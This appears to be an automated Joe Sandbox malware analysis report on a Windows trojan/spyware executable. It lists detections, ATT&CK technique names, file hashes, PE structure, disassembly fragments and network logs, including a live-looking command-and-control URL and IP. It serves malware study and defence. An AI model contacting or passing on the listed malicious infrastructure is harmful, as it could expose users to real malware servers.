Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory23
Virtualization/Sandbox Evasion
Remote Desktop Protocol1
Data from Local System
4
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account Manager13
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information
NTDS1
Remote System Discovery
Distributed Component Object ModelInput Capture5
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials216
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
HrIrtCXI3s.exe39%ReversingLabsWin32.Trojan.Generic
HrIrtCXI3s.exe100%AviraTR/Crypt.TPM.Gen
HrIrtCXI3s.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=00%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF170%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd40%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0l-0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868620%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5ht.top
5.101.3.217
truefalse
    high
    httpbin.org
    34.226.108.155
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0true
      • Avira URL Cloud: safe
      unknown
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862true
      • Avira URL Cloud: safe
      unknown
      https://httpbin.org/ipfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlHrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpfalse
          high
          http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://html4/loose.dtdHrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpfalse
            high
            https://curl.se/docs/alt-svc.html#HrIrtCXI3s.exefalse
              high
              https://httpbin.org/ipbeforeHrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpfalse
                high
                https://curl.se/docs/http-cookies.htmlHrIrtCXI3s.exe, HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpfalse
                  high
                  https://curl.se/docs/hsts.html#HrIrtCXI3s.exefalse
                    high
                    http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSHrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4HrIrtCXI3s.exe, 00000000.00000002.2014039691.00000000018CE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://curl.se/docs/http-cookies.html#HrIrtCXI3s.exefalse
                      high
                      https://curl.se/docs/alt-svc.htmlHrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpfalse
                        high
                        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0l-HrIrtCXI3s.exe, 00000000.00000003.1973567239.0000000001903000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000002.2014121507.0000000001905000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1973782520.0000000001904000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://.cssHrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpfalse
                          high
                          http://.jpgHrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            34.226.108.155
                            httpbin.orgUnited States
                            14618AMAZON-AESUSfalse
                            5.101.3.217
                            home.fiveth5ht.topRussian Federation
                            34665PINDC-ASRUfalse
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1580954
                            Start date and time:2024-12-26 14:13:08 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 52s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:5
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:HrIrtCXI3s.exe
                            renamed because original name is a hash value
                            Original Sample Name:629763eb39d91bb69848475c90ad1e63.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            TimeTypeDescription
                            13:14:05Task SchedulerRun new task: {6FD9324A-ED7A-441F-9B61-9ED31D5C4380} path:
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            34.226.108.155vJPhYDClT5.exeGet hashmaliciousUnknownBrowse
                              jklg6EIhyR.exeGet hashmaliciousUnknownBrowse
                                qr2JeuLuOQ.exeGet hashmaliciousUnknownBrowse
                                  gDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                                    x6Rd1DzUJA.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                      SzXZZDlkVE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                        ijn8pyFXSP.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                          WzyLDvldFI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                            PhwUGyok2i.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                              nRYpZg6i5E.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                httpbin.orgvJPhYDClT5.exeGet hashmaliciousUnknownBrowse
                                                • 34.226.108.155
                                                jklg6EIhyR.exeGet hashmaliciousUnknownBrowse
                                                • 34.226.108.155
                                                qr2JeuLuOQ.exeGet hashmaliciousUnknownBrowse
                                                • 34.226.108.155
                                                E6rBvcWFWu.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103
                                                gDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                                                • 34.226.108.155
                                                HFoyAy1tg8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                8kl5nJ3f9x.exeGet hashmaliciousCryptbotBrowse
                                                • 98.85.100.80
                                                7kf4hLzMoS.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                x6Rd1DzUJA.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 34.226.108.155
                                                WCeE1A6Xyz.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                PINDC-ASRU6ufJvua5w2.exeGet hashmaliciousCryptOne, Stealc, VidarBrowse
                                                • 91.215.85.11
                                                Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                • 91.215.85.142
                                                3cb770h94r.elfGet hashmaliciousOkiruBrowse
                                                • 45.145.172.130
                                                na.elfGet hashmaliciousMiraiBrowse
                                                • 5.188.210.194
                                                na.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 5.8.21.138
                                                lK1DKi27B4.dllGet hashmaliciousUnknownBrowse
                                                • 80.87.206.189
                                                lK1DKi27B4.dllGet hashmaliciousUnknownBrowse
                                                • 80.87.206.189
                                                https://trstwalsecu.com/Get hashmaliciousUnknownBrowse
                                                • 91.215.85.16
                                                https://metamaskinf.com/Get hashmaliciousUnknownBrowse
                                                • 91.215.85.79
                                                http://mygovau-service.com/Get hashmaliciousUnknownBrowse
                                                • 91.215.85.79
                                                AMAZON-AESUSvJPhYDClT5.exeGet hashmaliciousUnknownBrowse
                                                • 34.226.108.155
                                                jklg6EIhyR.exeGet hashmaliciousUnknownBrowse
                                                • 34.226.108.155
                                                qr2JeuLuOQ.exeGet hashmaliciousUnknownBrowse
                                                • 34.226.108.155
                                                E6rBvcWFWu.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103
                                                xd.mips.elfGet hashmaliciousMiraiBrowse
                                                • 34.206.168.77
                                                xd.x86.elfGet hashmaliciousMiraiBrowse
                                                • 44.213.56.197
                                                telnet.arm.elfGet hashmaliciousUnknownBrowse
                                                • 18.209.195.84
                                                telnet.sh4.elfGet hashmaliciousUnknownBrowse
                                                • 35.175.156.177
                                                armv5l.elfGet hashmaliciousMiraiBrowse
                                                • 44.206.15.113
                                                https://fsharetv.co/Get hashmaliciousUnknownBrowse
                                                • 54.225.185.110
                                                No context
                                                No context
                                                No created / dropped files found
                                                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                Entropy (8bit):7.984706666086648
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • VXD Driver (31/22) 0.00%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:HrIrtCXI3s.exe
                                                File size:4'476'416 bytes
                                                MD5:629763eb39d91bb69848475c90ad1e63
                                                SHA1:dc7b1a7b530dc7c8a22e50836ad747483b06bf3e
                                                SHA256:b493e279c1d18ac53caeca4e865c658c25f256fda1be8a5d9ef33184e67497e0
                                                SHA512:ae32f35381b81bf9242f8ecf0932ecc35ab32d8f113e196f95bf1828bfc8c5ec82214e9c2967af2ca660779921fd2001dc68faf86a52b771d2006d773478ef80
                                                SSDEEP:98304:Iz59801nKEwOdv/4QHqYX/osqMZX2E7EHgk:Oe01nKKHNosdZmIEf
                                                TLSH:C5263302A63A6C78CD9715B09D95E24DB1E00D365DBCAA2159237A3FAF0B1CC5ED0ECD
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@...................................D...@... ............................
                                                Icon Hash:90cececece8e8eb0
                                                Entrypoint:0x102a000
                                                Entrypoint Section:.taggant
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                DLL Characteristics:DYNAMIC_BASE
                                                Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                Signature Valid:
                                                Signature Issuer:
                                                Signature Validation Error:
                                                Error Number:
                                                Not Before, Not After
                                                  Subject Chain
                                                    Version:
                                                    Thumbprint MD5:
                                                    Thumbprint SHA-1:
                                                    Thumbprint SHA-256:
                                                    Serial:
                                                    Instruction
                                                    jmp 00007FFBBCCCF52Ah
                                                    cvttps2pi mm0, qword ptr [eax+eax+00h]
                                                    add byte ptr [eax], al
                                                    add cl, ch
                                                    add byte ptr [eax], ah
                                                    add byte ptr [eax], al
                                                    add byte ptr [0000000Ah], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], dh
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax+eax], bl
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add eax, 0000000Ah
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [edi], al
                                                    add byte ptr [eax], 00000000h
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    adc byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add eax, 0000000Ah
                                                    add byte ptr [eax], al
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xc284d40x10lqffkoae
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0xc284840x18lqffkoae
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    0x10000x6db0000x288a004b6018460450da1554a684b0520db3c8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x6dc0000x1ac0x2005044a17d360931486605268a85250ce8False0.587890625data4.535874912317744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    0x6de0000x3920000x2008bc8719af353418cd94257d0fd31ce17unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    lqffkoae0xa700000x1b90000x1b88002c4d3f2df722a97a37c98a37170e7dd1False0.9943955732122588OpenPGP Public Key7.954980284330732IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    wsxqcczr0xc290000x10000x4007776ce62886fdc17a633e1f6ed7957abFalse0.81640625data6.224627654125138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .taggant0xc2a0000x30000x2200ee69a878f222f121f024d511f6cf4cb0False0.05744485294117647DOS executable (COM)0.7884741957272196IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_MANIFEST0xc284e40x152ASCII text, with CRLF line terminators0.6479289940828402
                                                    DLLImport
                                                    kernel32.dlllstrcpy
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 26, 2024 14:14:17.034759045 CET49730443192.168.2.434.226.108.155
                                                    Dec 26, 2024 14:14:17.034816027 CET4434973034.226.108.155192.168.2.4
                                                    Dec 26, 2024 14:14:17.034900904 CET49730443192.168.2.434.226.108.155
                                                    Dec 26, 2024 14:14:17.046051025 CET49730443192.168.2.434.226.108.155
                                                    Dec 26, 2024 14:14:17.046067953 CET4434973034.226.108.155192.168.2.4
                                                    Dec 26, 2024 14:14:18.919981956 CET4434973034.226.108.155192.168.2.4
                                                    Dec 26, 2024 14:14:18.920665026 CET49730443192.168.2.434.226.108.155
                                                    Dec 26, 2024 14:14:18.920696974 CET4434973034.226.108.155192.168.2.4
                                                    Dec 26, 2024 14:14:18.922158003 CET4434973034.226.108.155192.168.2.4
                                                    Dec 26, 2024 14:14:18.922247887 CET49730443192.168.2.434.226.108.155
                                                    Dec 26, 2024 14:14:18.923731089 CET49730443192.168.2.434.226.108.155
                                                    Dec 26, 2024 14:14:18.923806906 CET4434973034.226.108.155192.168.2.4
                                                    Dec 26, 2024 14:14:18.936403990 CET49730443192.168.2.434.226.108.155
                                                    Dec 26, 2024 14:14:18.936424017 CET4434973034.226.108.155192.168.2.4
                                                    Dec 26, 2024 14:14:18.979897022 CET49730443192.168.2.434.226.108.155
                                                    Dec 26, 2024 14:14:19.274878979 CET4434973034.226.108.155192.168.2.4
                                                    Dec 26, 2024 14:14:19.275032997 CET4434973034.226.108.155192.168.2.4
                                                    Dec 26, 2024 14:14:19.275180101 CET49730443192.168.2.434.226.108.155
                                                    Dec 26, 2024 14:14:19.283993959 CET49730443192.168.2.434.226.108.155
                                                    Dec 26, 2024 14:14:19.284013033 CET4434973034.226.108.155192.168.2.4
                                                    Dec 26, 2024 14:14:22.211525917 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.331146002 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.331253052 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.332536936 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.452111959 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.452142000 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.452162981 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.452194929 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.452215910 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.452215910 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.452249050 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.452265024 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.452265978 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.452306986 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.452394009 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.452406883 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.452449083 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.452457905 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.452503920 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.452529907 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.452585936 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.571942091 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.571984053 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.572017908 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.572036982 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.572046041 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.572069883 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.572089911 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.572127104 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.572135925 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.572179079 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.572204113 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.619992018 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.620080948 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.731929064 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.732009888 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:22.779892921 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.891959906 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:22.892132044 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.093106985 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.093158007 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.335863113 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.336009026 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.416296005 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.416455030 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.416529894 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.455487013 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.455553055 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.536138058 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.536149979 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.536159039 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.536189079 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.536199093 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.536214113 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.536246061 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.536257029 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.536267996 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.536303043 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.536312103 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.536349058 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.536369085 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.536379099 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.536408901 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.536420107 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.536468983 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.536478043 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.536525011 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.536534071 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.536580086 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.536650896 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.536699057 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.536731005 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.536772966 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.536906958 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.537056923 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.537139893 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.537178040 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.537271023 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.537300110 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.537481070 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.537512064 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.537560940 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.537595987 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.537739992 CET80497315.101.3.217192.168.2.4
